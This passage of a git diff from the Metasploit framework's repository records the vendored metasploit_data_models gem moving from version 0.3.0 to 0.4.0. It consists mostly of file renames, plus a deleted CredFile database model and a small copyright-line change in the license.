 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 =>
metasploit_data_models-0.4.0}/app/models/mdm/vuln_ref.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/web_form.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/web_page.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/web_site.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/web_vuln.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/wmap_request.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/wmap_target.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/workspace.rb (98%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/bin/mdm_console (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/console_db.yml (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/lib/mdm.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/lib/mdm/host/operating_system_normalization.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/lib/metasploit_data_models.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/lib/metasploit_data_models/base64_serializer.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/lib/metasploit_data_models/engine.rb (100%)
 rename
lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/lib/metasploit_data_models/serialized_prefs.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/lib/metasploit_data_models/validators/ip_format_validator.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/lib/metasploit_data_models/validators/password_is_strong_validator.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/lib/metasploit_data_models/version.rb (95%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/metasploit_data_models.gemspec (94%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/script/rails (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/Rakefile (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/app/assets/javascripts/application.js (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/app/assets/stylesheets/application.css (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/app/controllers/application_controller.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/app/helpers/application_helper.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/app/mailers/.gitkeep (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/app/models/.gitkeep (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 =>
metasploit_data_models-0.4.0}/spec/dummy/app/views/layouts/application.html.erb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/config.ru (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/config/application.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/config/boot.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/config/database.yml.example (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/config/environment.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/config/environments/development.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/config/environments/production.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/config/environments/test.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/config/initializers/backtrace_silencers.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/config/initializers/inflections.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/config/initializers/mime_types.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/config/initializers/secret_token.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/config/initializers/session_store.rb (100%)
 rename
lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/config/initializers/wrap_parameters.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/config/routes.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/lib/assets/.gitkeep (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/log/.gitkeep (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/public/404.html (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/public/422.html (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/public/500.html (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/public/favicon.ico (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/script/rails (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/lib/base64_serializer_spec.rb (100%)
 rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/spec_helper.rb (100%)
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred_file.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred_file.rb
deleted file mode 100755
index f8bc29d84c..0000000000
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred_file.rb
+++ /dev/null
@@ -1,8 +0,0 @@
-class Mdm::CredFile < ActiveRecord::Base
- #
- # Relations
- #
- belongs_to :workspace, :class_name => 'Mdm::Workspace'
-
- ActiveSupport.run_load_hooks(:mdm_cred_file, self)
-end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/.gitignore b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/.gitignore
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/.gitignore
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/.gitignore
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/.rspec b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/.rspec
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/.rspec
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/.rspec
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/Gemfile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Gemfile
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/Gemfile
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Gemfile
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/LICENSE b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/LICENSE
similarity index 97%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/LICENSE
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/LICENSE
index 7b9ec00a08..7743a2ea9a 100644
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/LICENSE
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/LICENSE
@@ -1,4 +1,4 @@ -Copyright (C) 2012, Rapid7 LLC +Copyright (C) 2012, Rapid7, Inc. All rights reserved. Redistribution and use in source and binary forms, with or without modification,
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/README.md b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/README.md
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/README.md
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/README.md
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/Rakefile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Rakefile
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/Rakefile
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Rakefile
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/api_key.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/api_key.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/api_key.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/api_key.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/client.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/client.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/client.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/client.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/cred.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/cred.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/event.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/event.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/event.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/event.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/exploit_attempt.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/exploit_attempt.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/exploit_attempt.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/exploit_attempt.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/exploited_host.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/exploited_host.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/exploited_host.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/exploited_host.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host_detail.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host_detail.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host_detail.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host_tag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host_tag.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host_tag.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host_tag.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/imported_cred.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/imported_cred.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/imported_cred.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/imported_cred.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/listener.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/listener.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/listener.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/listener.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/loot.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/loot.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/loot.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/loot.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/macro.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/macro.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/macro.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/macro.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/mod_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/mod_ref.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/mod_ref.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/mod_ref.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_action.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_action.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_action.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_action.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_arch.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_arch.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_arch.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_arch.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_author.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_author.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_author.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_author.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_detail.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_detail.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_detail.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_mixin.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_mixin.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_mixin.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_mixin.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_platform.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_platform.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_platform.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_platform.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_ref.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_ref.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_ref.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_target.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_target.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_target.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_target.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/nexpose_console.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/nexpose_console.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/nexpose_console.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/nexpose_console.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/note.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/note.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/note.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/note.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/profile.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/profile.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/profile.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/profile.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/ref.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/ref.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/ref.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/report.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/report.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/report.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/report.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/report_template.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/report_template.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/report_template.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/report_template.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/route.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/route.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/route.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/route.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/service.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/service.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/service.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/service.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/session.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/session.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/session.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/session.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/session_event.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/session_event.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/session_event.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/session_event.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/tag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/tag.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/tag.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/tag.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/task.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/task.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/task.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/task.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/user.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/user.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/user.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/user.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_attempt.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_attempt.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_attempt.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_attempt.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_detail.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_detail.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_detail.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_ref.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_ref.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_ref.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_form.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_form.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_form.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_form.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_page.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_page.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_page.rb
